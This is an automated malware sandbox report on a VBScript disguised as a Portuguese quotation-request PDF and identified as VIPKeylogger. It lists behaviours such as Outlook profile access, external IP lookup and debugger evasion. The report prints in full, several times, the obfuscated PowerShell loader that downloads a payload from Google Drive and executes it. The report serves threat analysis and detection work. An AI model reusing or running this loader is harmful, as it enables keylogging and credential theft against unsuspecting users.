Analysis Overview
SHA256
babecadcc173a09c23ee326f8b7a9a1cc9ff1d795ca4e40c686687c8c68c0f99
Threat Level: Known bad
The file Pedido de Cotação -RFQ20241030_Pdf.vbs was found to be: Known bad.
Malicious Activity Summary
VIPKeylogger
Vipkeylogger family
Blocklisted process makes network request
Checks computer location settings
Command and Scripting Interpreter: PowerShell
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Accesses Microsoft Outlook profiles
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Browser Information Discovery
System Location Discovery: System Language Discovery
Enumerates physical storage devices
outlook_office_path
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
outlook_win_path
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-31 11:57
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-31 11:57
Reported
2024-10-31 12:00
Platform
win7-20240903-en
Max time kernel
150s
Max time network
126s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1956 wrote to memory of 3012 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1956 wrote to memory of 3012 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1956 wrote to memory of 3012 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação -RFQ20241030_Pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Chefkahytter forforstrkeren Stipendiary Aglossa Optegnendes #>;$Fllesmarkeder='Crinet';<#Suppressedly Regnskabsadministration ministerielle Addeem Inviolate Blanketters Unperfectedness #>; function Dksdrengene($glottalise){If ($host.DebuggerEnabled) {$Homomorphic144++;}$Peberms=$Bildkkene+$glottalise.'Length'-$Homomorphic144; for ( $Sheveret=5;$Sheveret -lt $Peberms;$Sheveret+=6){$coccygomorphic=$Sheveret;$Monoplegic+=$glottalise[$Sheveret];}$Monoplegic;}function Chaplin($Skrvebanens){ & ($Samtaleemnets) ($Skrvebanens);}$Umaadelighedens=Dksdrengene 'JimsoML,ndioAnthez eneaiJong,lCassylJed,yaSwabb/Papir ';$Flabellate=Dksdrengene ' isbuTPres l de fsCi il1Coldp2M.ckl ';$Hoste=' Noni[JanglnUn coeGentiT Vent. eateSHjforePart rHypotvTi,skiMindecMillie HawapsaneroStoreI SortNPreacTCognimDilata ToxinChewya Hom g Tilhe RechrUdetj] Arbe:inter:Varmts Telee Dyppc ekruUFuse.R Lat ID lseTSubdiY DisapKeltiRSels oP einTArb jo atsucDicynoSmrreLSpeed=Abamp$FimrefFo maLBu,ikA Gy nBShi.iEDis oLFilmsLT,onsA ArcftPalteeDiffe ';$Umaadelighedens+=Dksdrengene 'Coy,o5L.nds.backi0 aby Ejend(YampaWPro riHauntnH drod orhaoTittlwProsksTreet EctypNP repTSpnen over 1Remna0 Disp. anc0 Perr;tun,t Ac eWRe ruiHand n Tilg6Sagsb4P xie;Unawk Flerexdi ul6Under4Satsn;Skate ErindrRabbiv Clup:St nd1Tippe3 ,ilo1 mmet. C rr0 He.r)Skri ommaGFdepue kompc hoejk PolloBhuta/Kanal2Voves0elect1Tumbe0Ni,zs0Kolle1Xeno,0Svmm 1 Hype BrkkeFVirkeiChapprPe iteDubitfExocroDoctrxUskyl/Mlkeg1Mreng3Skrdd1Ar,vr..etti0Deci ';$Nedenstaaende=Dksdrengene 'Rke nUSviklSKei tEJaevnRCorra-Unr.sABan lgLa,dge EnevnPunsttHubri ';$Ekspatrieres=Dksdrengene 'Mainph onpht egnet fuldp ira scongl:Krubu/Tryk./CemendPh.torNormaiSkattvRealieKunst.vitrygGuileoSlvfao Omstg Tikrl ebraeBim t. Me oc BomboCountmHuspl/HusleuFarvec Klan? ossteParadxPeritpChayooUnve,rWifectO den=brepodIndbao mmanwQuad.nUrethlOrganoBabyeaBevb dGorsi& .heoiPail d Pike= apsa1PossePPotenKCircux DiaxMstatsT R,diDDaa seOverc3HenrehSampaq Char4 U.orJRolfdN Kaf KPopulXSla ntSammec Ka ixAstro-KrambKHyperTTmmerZAdullnDatais Unp 5 omspv Re,rOThanjlAdstrp rsnoUn onw,edegdEs,oi ';$Ambari=Dksdrengene 'Eksal> Stif ';$Samtaleemnets=Dksdrengene 'Tran iFagudEHerskX amat ';$Sethite='Flynders';$Clotildes='\Kondemnations.Stu';Chaplin (Dksdrengene 'Torne$Ele tGP ysolTinseoFaktobEmptna ,qualAnthr:datasUM lonv d udr quipGMatkaEFormiLDatalI sjlegSupertUnre,= Disc$Eti leSamstnArachVAccre:falceADkninpSinclPWoodjDHusmnA JaetTInapoA onos+ Mili$AktivCSolskL YpuroDigittSo,gsICog.alEpitodDiploE Ultrs Rese ');Chaplin (Dksdrengene 'Nonma$TightG sterlDruesOSilkibMingla O,isLSmote: RathKPriodI MelilrefekdPaloneforhoS UnveKStaveA.ndretGengiT astee D,gslNov.lOKonfivMes ieambignPakkeeHodopSMusic=Wei.h$ rutsECl.akK Drn sHauynp AmiaALngdetChampRS.netI.igorEMisprrW.ippesnustSAffor. elveSNiflipReverL spuniCraniTChara( Pylo$Re lyaD skeMRompeB .ustaCorpoRRepariAviga)Orth ');Chaplin (Dksdrengene $Hoste);$Ekspatrieres=$Kildeskattelovenes[0];$ekstasens=(Dksdrengene ' Gor.$StorhG HoveL AfpeoAnnusBHadenaK mmoLCoqui:TruanP HistAForhalUn inARombueBarcoo Bookn amnie TrevMSvirvEKo trrGynnatKristISide NVauquEDete A Madl=AriasnExtr,eS,efaWBrand-AdmeaO moribBuckoJba cheDbuinC WellT Uddr OpnaaSmi asY Vsk,sClibaT Co,tec untMPolly. uarnNOeconEkildeT Fors.FletfWlumineFiskebDong c GentlJournIOkayse addlN ForuTfiske ');Chaplin ($ekstasens);Chaplin (Dksdrengene 'Under$ForkoPEmp.daAbdiclLampeaHaffieFul eoKy,linImprieGldssmCha,oeUncomr Bilat HangiGalopn Firee U deaShowu. SeriHZ lueeBranda Resed SankeCrumbrtonefsPenid[Dakty$Co ybNlatakerealedHovede Sk.an,maadsTusintNocena TopmaModk eTh,lenStalad unmue udic],arit=Sorte$Mell UWrangmTil aaSchleaPseudd Undse AmphlWeekeiDr ekgBorehhRampoeChilddHa sheImplenNon,psUnder ');$Stvfrie=Dksdrengene 'Voldg$MortiPU graabadgelLagonaC,evaeDelinoP ojenHurlieBo tfmsjakaeMen erNe frt Ashli ruppn,ilereInco a Nond.VssunD ToteoOpka wRengrnfo nulStvrioSkraaaYugaddgenerFFee,siSpagelReswie Deli(Wampu$T kstEExorckRe,ersF evapSortiaSkrivtElverrtransiExploeUimodrHakkeeFrem.sRepro,Nucl $Co teC atodrCykele ,lidsTres iEvangvOdon eParoc)Skrm ';$Cresive=$Uvrgeligt;Chaplin (Dksdrengene 'Metod$A sthG Li,vLBedetoUnderBRedemaLrestLGyldi:GerniD BlehISt rkS Lovek Ki.eA Symbn BetoT SesseOra gNUnfur=Udsvi(PatenT Hoveeforu SBilgkTErgot-SejlaPLuksuAcar vT.iktuh Un e Potb$ HexdCHj idrPsykieUndeps Id.nIVaredV ncoresocag)Vejle ');while (!$Diskanten) {Chaplin (Dksdrengene 'Masto$Hushtg ,lasl RhaboAltmubHoneyaBa milHype,:A ridSPakket m ltoPredirs.aldfS hoooB llerPriorb Ba,brStagguDecargKorseepraecrNoneasFotoa=,amac$ S.aet ucurCes pucalimeWivec ') ;Chaplin $Stvfrie;Chaplin (Dksdrengene 'Bark sMik oT ShinaSkinkrM croTChawb-NewfasSandwLProkleN.natEannmap Hink Sport4R,gnh ');Chaplin (Dksdrengene ' Part$MiksegIntraLBorgeoEddadbMachiADilatl Stea:Descad osiICastiSSuperKSmokeAH.llanEngo.TImpenEAtomanParec= Dens(UndelT Uds E plumsRepawtUddan-Chau.p OpbaaKo.materhveHNe.fo Pa e$meg lCI drerShagtegaardS.sychIGenopv UrnfeBackb)Dr.in ') ;Chaplin (Dksdrengene 'Mijn $Sinh GHvlveLZaithoGoldwbJenlgaMy teL A si:GrnttoPerikRTal,tAAut.kT etbuo KonfRTumidlPersoiTor,ekPreexeMobil5 He.e=Imm n$Me icg DdskLSpra oMisbeb Monoa TwisLex,an:.easeSSciamuContrBEmeroO Cla b .oudLNitriIAtommq Mel u inseEbeskiLSkaffY ande+ ubge+Umrke%Nonwh$TandrKSk,diIAtom LCap rdF,rdue edbeSBy nikC,ustA,ollatCu bstHulkoE ozerLVa,iooUnpriVDisprE adion RowtenamessRetro.Ser,ecPeripOSemipU SnvsN jarkTPrinc ') ;$Ekspatrieres=$Kildeskattelovenes[$Oratorlike5];}$Kloningens=291747;$Telexes=30474;Chaplin (Dksdrengene 'Antir$SortsgD.shalDictaO GormbPilheA RekrL inot:paaskB NonmE .ellNtkkelD olstE.chmoeFol eSFiske Skri=posty GrungEleaneDispotMikro-RetsfCgigaboH,rpsNSp bat t ruEU worNi.dhaTAutoe Ungra$Ho.otcDephyrDarkleStjflsbevilIClac.vQuadretid a ');Chaplin (Dksdrengene 'Peace$Nondig arbelRekoro.olfbbKnotna yleblSlutt:ExaspAArsend ovpre Sph l ManubGnaveeBerasrLa.ultOverl Theo=feci, Sp,ci[ Ca dS Sa ayH.mmesMai itlexipeGelinmSpade.miniaC KirkoOpalinAwarevPsil eGrsserRiccitGodm ]rrel : Oxya: R.keFUncanr ForaoBygdemPelagB Ra daA maisBo tpeUd in6Paatv4BrandSemmottHyd.trConv i VirinR ombg sthn(Busin$PersiBAnkyle EspanBoksedSkjuleSy teeKonkus Oilt)Streg ');Chaplin (Dksdrengene ' Dele$HonniG,alveLAl,ogO YoghBCustoaTuttslMaksi:ObjekSGoniowUnconiCorneLBr,llLRyk.eb raveoMlkenw SamlL Ends Kaske=Nunci Lever[Sockes LivlyFi.riSChro t.arsreOverlmHandw.NominTAseiseHam lXFuseltflles.DraabeNonilnBaranCPreacOBog.pdVideriArm.rnJoustGSlagv] Spil:Tiltv:Over aCoendSLandiCDeco,iDiscriExant.Skre GPsykoeSheltT S ksSTrollTTri crPeshkIFlydenO phaGUnap.(B rde$TribaaLinoldStatiET ntelSkilnberhveeTh ncrLectiTSyste) Kapi ');Chaplin (Dksdrengene 'Monos$ issegMotivlKvkkeoM tacb Cen.AB ugtlOprik:ZoomiF JubioStayerFortefSwartrCrumbeRegissHonni=T,del$UddybS HjerWFinkmiIngrelB dirl.lbanBArctoO H roW verflBilop.EfterS mateuPeridbTaanesMil iTJo neRGe riIUnpr,n ,latgFrede(I fra$ P ndKF,owslAdr soPulviNBibetiTutteNForesg,ekvieSol dN Tu.tSKalib,Piar $IsdantSekseE oreoLNonsiED ltrx sm keWilkeSChoco)Amph, ');Chaplin $Forfres;"
Network
Files
memory/3012-4-0x000007FEF5C8E000-0x000007FEF5C8F000-memory.dmp
memory/3012-5-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
memory/3012-6-0x0000000001E00000-0x0000000001E08000-memory.dmp
memory/3012-7-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp
memory/3012-8-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp
memory/3012-9-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp
memory/3012-10-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp
memory/3012-11-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp
memory/3012-12-0x000007FEF5C8E000-0x000007FEF5C8F000-memory.dmp
memory/3012-13-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp
memory/3012-14-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp
memory/3012-15-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp
memory/3012-16-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp
memory/3012-17-0x000007FEF59D0000-0x000007FEF636D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-31 11:57
Reported
2024-10-31 12:00
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
VIPKeylogger
Vipkeylogger family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4436 wrote to memory of 3204 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4436 wrote to memory of 3204 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4776 wrote to memory of 4800 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 4776 wrote to memory of 4800 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 4776 wrote to memory of 4800 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 4776 wrote to memory of 4800 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação -RFQ20241030_Pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Chefkahytter forforstrkeren Stipendiary Aglossa Optegnendes #>;$Fllesmarkeder='Crinet';<#Suppressedly Regnskabsadministration ministerielle Addeem Inviolate Blanketters Unperfectedness #>; function Dksdrengene($glottalise){If ($host.DebuggerEnabled) {$Homomorphic144++;}$Peberms=$Bildkkene+$glottalise.'Length'-$Homomorphic144; for ( $Sheveret=5;$Sheveret -lt $Peberms;$Sheveret+=6){$coccygomorphic=$Sheveret;$Monoplegic+=$glottalise[$Sheveret];}$Monoplegic;}function Chaplin($Skrvebanens){ & ($Samtaleemnets) ($Skrvebanens);}$Umaadelighedens=Dksdrengene 'JimsoML,ndioAnthez eneaiJong,lCassylJed,yaSwabb/Papir ';$Flabellate=Dksdrengene ' isbuTPres l de fsCi il1Coldp2M.ckl ';$Hoste=' Noni[JanglnUn coeGentiT Vent. eateSHjforePart rHypotvTi,skiMindecMillie HawapsaneroStoreI SortNPreacTCognimDilata ToxinChewya Hom g Tilhe RechrUdetj] Arbe:inter:Varmts Telee Dyppc ekruUFuse.R Lat ID lseTSubdiY DisapKeltiRSels oP einTArb jo atsucDicynoSmrreLSpeed=Abamp$FimrefFo maLBu,ikA Gy nBShi.iEDis oLFilmsLT,onsA ArcftPalteeDiffe ';$Umaadelighedens+=Dksdrengene 'Coy,o5L.nds.backi0 aby Ejend(YampaWPro riHauntnH drod orhaoTittlwProsksTreet EctypNP repTSpnen over 1Remna0 Disp. anc0 Perr;tun,t Ac eWRe ruiHand n Tilg6Sagsb4P xie;Unawk Flerexdi ul6Under4Satsn;Skate ErindrRabbiv Clup:St nd1Tippe3 ,ilo1 mmet. C rr0 He.r)Skri ommaGFdepue kompc hoejk PolloBhuta/Kanal2Voves0elect1Tumbe0Ni,zs0Kolle1Xeno,0Svmm 1 Hype BrkkeFVirkeiChapprPe iteDubitfExocroDoctrxUskyl/Mlkeg1Mreng3Skrdd1Ar,vr..etti0Deci ';$Nedenstaaende=Dksdrengene 'Rke nUSviklSKei tEJaevnRCorra-Unr.sABan lgLa,dge EnevnPunsttHubri ';$Ekspatrieres=Dksdrengene 'Mainph onpht egnet fuldp ira scongl:Krubu/Tryk./CemendPh.torNormaiSkattvRealieKunst.vitrygGuileoSlvfao Omstg Tikrl ebraeBim t. Me oc BomboCountmHuspl/HusleuFarvec Klan? ossteParadxPeritpChayooUnve,rWifectO den=brepodIndbao mmanwQuad.nUrethlOrganoBabyeaBevb dGorsi& .heoiPail d Pike= apsa1PossePPotenKCircux DiaxMstatsT R,diDDaa seOverc3HenrehSampaq Char4 U.orJRolfdN Kaf KPopulXSla ntSammec Ka ixAstro-KrambKHyperTTmmerZAdullnDatais Unp 5 omspv Re,rOThanjlAdstrp rsnoUn onw,edegdEs,oi ';$Ambari=Dksdrengene 'Eksal> Stif ';$Samtaleemnets=Dksdrengene 'Tran iFagudEHerskX amat ';$Sethite='Flynders';$Clotildes='\Kondemnations.Stu';Chaplin (Dksdrengene 'Torne$Ele tGP ysolTinseoFaktobEmptna ,qualAnthr:datasUM lonv d udr quipGMatkaEFormiLDatalI sjlegSupertUnre,= Disc$Eti leSamstnArachVAccre:falceADkninpSinclPWoodjDHusmnA JaetTInapoA onos+ Mili$AktivCSolskL YpuroDigittSo,gsICog.alEpitodDiploE Ultrs Rese ');Chaplin (Dksdrengene 'Nonma$TightG sterlDruesOSilkibMingla O,isLSmote: RathKPriodI MelilrefekdPaloneforhoS UnveKStaveA.ndretGengiT astee D,gslNov.lOKonfivMes ieambignPakkeeHodopSMusic=Wei.h$ rutsECl.akK Drn sHauynp AmiaALngdetChampRS.netI.igorEMisprrW.ippesnustSAffor. elveSNiflipReverL spuniCraniTChara( Pylo$Re lyaD skeMRompeB .ustaCorpoRRepariAviga)Orth ');Chaplin (Dksdrengene $Hoste);$Ekspatrieres=$Kildeskattelovenes[0];$ekstasens=(Dksdrengene ' Gor.$StorhG HoveL AfpeoAnnusBHadenaK mmoLCoqui:TruanP HistAForhalUn inARombueBarcoo Bookn amnie TrevMSvirvEKo trrGynnatKristISide NVauquEDete A Madl=AriasnExtr,eS,efaWBrand-AdmeaO moribBuckoJba cheDbuinC WellT Uddr OpnaaSmi asY Vsk,sClibaT Co,tec untMPolly. uarnNOeconEkildeT Fors.FletfWlumineFiskebDong c GentlJournIOkayse addlN ForuTfiske ');Chaplin ($ekstasens);Chaplin (Dksdrengene 'Under$ForkoPEmp.daAbdiclLampeaHaffieFul eoKy,linImprieGldssmCha,oeUncomr Bilat HangiGalopn Firee U deaShowu. SeriHZ lueeBranda Resed SankeCrumbrtonefsPenid[Dakty$Co ybNlatakerealedHovede Sk.an,maadsTusintNocena TopmaModk eTh,lenStalad unmue udic],arit=Sorte$Mell UWrangmTil aaSchleaPseudd Undse AmphlWeekeiDr ekgBorehhRampoeChilddHa sheImplenNon,psUnder ');$Stvfrie=Dksdrengene 'Voldg$MortiPU graabadgelLagonaC,evaeDelinoP ojenHurlieBo tfmsjakaeMen erNe frt Ashli ruppn,ilereInco a Nond.VssunD ToteoOpka wRengrnfo nulStvrioSkraaaYugaddgenerFFee,siSpagelReswie Deli(Wampu$T kstEExorckRe,ersF evapSortiaSkrivtElverrtransiExploeUimodrHakkeeFrem.sRepro,Nucl $Co teC atodrCykele ,lidsTres iEvangvOdon eParoc)Skrm ';$Cresive=$Uvrgeligt;Chaplin (Dksdrengene 'Metod$A sthG Li,vLBedetoUnderBRedemaLrestLGyldi:GerniD BlehISt rkS Lovek Ki.eA Symbn BetoT SesseOra gNUnfur=Udsvi(PatenT Hoveeforu SBilgkTErgot-SejlaPLuksuAcar vT.iktuh Un e Potb$ HexdCHj idrPsykieUndeps Id.nIVaredV ncoresocag)Vejle ');while (!$Diskanten) {Chaplin (Dksdrengene 'Masto$Hushtg ,lasl RhaboAltmubHoneyaBa milHype,:A ridSPakket m ltoPredirs.aldfS hoooB llerPriorb Ba,brStagguDecargKorseepraecrNoneasFotoa=,amac$ S.aet ucurCes pucalimeWivec ') ;Chaplin $Stvfrie;Chaplin (Dksdrengene 'Bark sMik oT ShinaSkinkrM croTChawb-NewfasSandwLProkleN.natEannmap Hink Sport4R,gnh ');Chaplin (Dksdrengene ' Part$MiksegIntraLBorgeoEddadbMachiADilatl Stea:Descad osiICastiSSuperKSmokeAH.llanEngo.TImpenEAtomanParec= Dens(UndelT Uds E plumsRepawtUddan-Chau.p OpbaaKo.materhveHNe.fo Pa e$meg lCI drerShagtegaardS.sychIGenopv UrnfeBackb)Dr.in ') ;Chaplin (Dksdrengene 'Mijn $Sinh GHvlveLZaithoGoldwbJenlgaMy teL A si:GrnttoPerikRTal,tAAut.kT etbuo KonfRTumidlPersoiTor,ekPreexeMobil5 He.e=Imm n$Me icg DdskLSpra oMisbeb Monoa TwisLex,an:.easeSSciamuContrBEmeroO Cla b .oudLNitriIAtommq Mel u inseEbeskiLSkaffY ande+ ubge+Umrke%Nonwh$TandrKSk,diIAtom LCap rdF,rdue edbeSBy nikC,ustA,ollatCu bstHulkoE ozerLVa,iooUnpriVDisprE adion RowtenamessRetro.Ser,ecPeripOSemipU SnvsN jarkTPrinc ') ;$Ekspatrieres=$Kildeskattelovenes[$Oratorlike5];}$Kloningens=291747;$Telexes=30474;Chaplin (Dksdrengene 'Antir$SortsgD.shalDictaO GormbPilheA RekrL inot:paaskB NonmE .ellNtkkelD olstE.chmoeFol eSFiske Skri=posty GrungEleaneDispotMikro-RetsfCgigaboH,rpsNSp bat t ruEU worNi.dhaTAutoe Ungra$Ho.otcDephyrDarkleStjflsbevilIClac.vQuadretid a ');Chaplin (Dksdrengene 'Peace$Nondig arbelRekoro.olfbbKnotna yleblSlutt:ExaspAArsend ovpre Sph l ManubGnaveeBerasrLa.ultOverl Theo=feci, Sp,ci[ Ca dS Sa ayH.mmesMai itlexipeGelinmSpade.miniaC KirkoOpalinAwarevPsil eGrsserRiccitGodm ]rrel : Oxya: R.keFUncanr ForaoBygdemPelagB Ra daA maisBo tpeUd in6Paatv4BrandSemmottHyd.trConv i VirinR ombg sthn(Busin$PersiBAnkyle EspanBoksedSkjuleSy teeKonkus Oilt)Streg ');Chaplin (Dksdrengene ' Dele$HonniG,alveLAl,ogO YoghBCustoaTuttslMaksi:ObjekSGoniowUnconiCorneLBr,llLRyk.eb raveoMlkenw SamlL Ends Kaske=Nunci Lever[Sockes LivlyFi.riSChro t.arsreOverlmHandw.NominTAseiseHam lXFuseltflles.DraabeNonilnBaranCPreacOBog.pdVideriArm.rnJoustGSlagv] Spil:Tiltv:Over aCoendSLandiCDeco,iDiscriExant.Skre GPsykoeSheltT S ksSTrollTTri crPeshkIFlydenO phaGUnap.(B rde$TribaaLinoldStatiET ntelSkilnberhveeTh ncrLectiTSyste) Kapi ');Chaplin (Dksdrengene 'Monos$ issegMotivlKvkkeoM tacb Cen.AB ugtlOprik:ZoomiF JubioStayerFortefSwartrCrumbeRegissHonni=T,del$UddybS HjerWFinkmiIngrelB dirl.lbanBArctoO H roW verflBilop.EfterS mateuPeridbTaanesMil iTJo neRGe riIUnpr,n ,latgFrede(I fra$ P ndKF,owslAdr soPulviNBibetiTutteNForesg,ekvieSol dN Tu.tSKalib,Piar $IsdantSekseE oreoLNonsiED ltrx sm keWilkeSChoco)Amph, ');Chaplin $Forfres;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Chefkahytter forforstrkeren Stipendiary Aglossa Optegnendes #>;$Fllesmarkeder='Crinet';<#Suppressedly Regnskabsadministration ministerielle Addeem Inviolate Blanketters Unperfectedness #>; function Dksdrengene($glottalise){If ($host.DebuggerEnabled) {$Homomorphic144++;}$Peberms=$Bildkkene+$glottalise.'Length'-$Homomorphic144; for ( $Sheveret=5;$Sheveret -lt $Peberms;$Sheveret+=6){$coccygomorphic=$Sheveret;$Monoplegic+=$glottalise[$Sheveret];}$Monoplegic;}function Chaplin($Skrvebanens){ & ($Samtaleemnets) ($Skrvebanens);}$Umaadelighedens=Dksdrengene 'JimsoML,ndioAnthez eneaiJong,lCassylJed,yaSwabb/Papir ';$Flabellate=Dksdrengene ' isbuTPres l de fsCi il1Coldp2M.ckl ';$Hoste=' Noni[JanglnUn coeGentiT Vent. eateSHjforePart rHypotvTi,skiMindecMillie HawapsaneroStoreI 